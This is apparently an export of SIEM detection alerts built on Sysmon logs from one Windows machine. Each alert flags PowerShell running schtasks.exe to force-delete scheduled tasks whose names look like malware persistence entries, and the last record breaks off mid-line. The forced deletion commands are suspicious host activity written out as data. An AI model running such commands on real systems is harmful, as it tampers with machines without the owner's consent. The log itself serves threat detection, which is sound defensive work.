C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Sorry /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:03.983225600Z"",""eventRecordID"":""2484"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:03.975\r\nProcessGuid: {df9fc3d3-b37b-5ecf-0000-001064791e00}\r\nProcessId: 6308\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Sorry /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:03.975"",""processGuid"":""{df9fc3d3-b37b-5ecf-0000-001064791e00}"",""processId"":""6308"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Sorry /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:31.979",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:03.940 +ProcessGuid: {df9fc3d3-b37b-5ecf-0000-0010b2771e00} +ProcessId: 3812 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ngm /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN ngm /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:03.946887000Z"",""eventRecordID"":""2483"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:03.940\r\nProcessGuid: {df9fc3d3-b37b-5ecf-0000-0010b2771e00}\r\nProcessId: 3812\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN ngm /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:03.940"",""processGuid"":""{df9fc3d3-b37b-5ecf-0000-0010b2771e00}"",""processId"":""3812"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN ngm /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:31.964",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:03.900 +ProcessGuid: {df9fc3d3-b37b-5ecf-0000-00101b761e00} +ProcessId: 3668 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN gm /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN gm /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:03.903400200Z"",""eventRecordID"":""2482"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:03.900\r\nProcessGuid: {df9fc3d3-b37b-5ecf-0000-00101b761e00}\r\nProcessId: 3668\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN gm /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:03.900"",""processGuid"":""{df9fc3d3-b37b-5ecf-0000-00101b761e00}"",""processId"":""3668"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN gm /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:31.932",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:03.870 +ProcessGuid: {df9fc3d3-b37b-5ecf-0000-00108a741e00} +ProcessId: 7272 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""Update service for products"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Update service for products\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:03.873203600Z"",""eventRecordID"":""2481"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:03.870\r\nProcessGuid: {df9fc3d3-b37b-5ecf-0000-00108a741e00}\r\nProcessId: 7272\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Update service for products\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:03.870"",""processGuid"":""{df9fc3d3-b37b-5ecf-0000-00108a741e00}"",""processId"":""7272"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""Update service for products\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:31.916",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:03.841 +ProcessGuid: {df9fc3d3-b37b-5ecf-0000-0010c7721e00} +ProcessId: 2128 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""Oracle Products Reporter"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Oracle Products Reporter\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:03.843377600Z"",""eventRecordID"":""2480"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:03.841\r\nProcessGuid: {df9fc3d3-b37b-5ecf-0000-0010c7721e00}\r\nProcessId: 2128\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Oracle Products Reporter\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:03.841"",""processGuid"":""{df9fc3d3-b37b-5ecf-0000-0010c7721e00}"",""processId"":""2128"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""Oracle Products Reporter\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:31.902",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:03.806 +ProcessGuid: {df9fc3d3-b37b-5ecf-0000-0010d8701e00} +ProcessId: 7984 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""Spooler SubSystem Service"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Spooler SubSystem Service\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:03.808754200Z"",""eventRecordID"":""2479"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:03.806\r\nProcessGuid: {df9fc3d3-b37b-5ecf-0000-0010d8701e00}\r\nProcessId: 7984\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Spooler SubSystem Service\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:03.806"",""processGuid"":""{df9fc3d3-b37b-5ecf-0000-0010d8701e00}"",""processId"":""7984"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""Spooler SubSystem Service\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:31.885",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:03.775 +ProcessGuid: {df9fc3d3-b37b-5ecf-0000-0010db6e1e00} +ProcessId: 7088 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""Microsoft Telemetry"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Microsoft Telemetry\"" 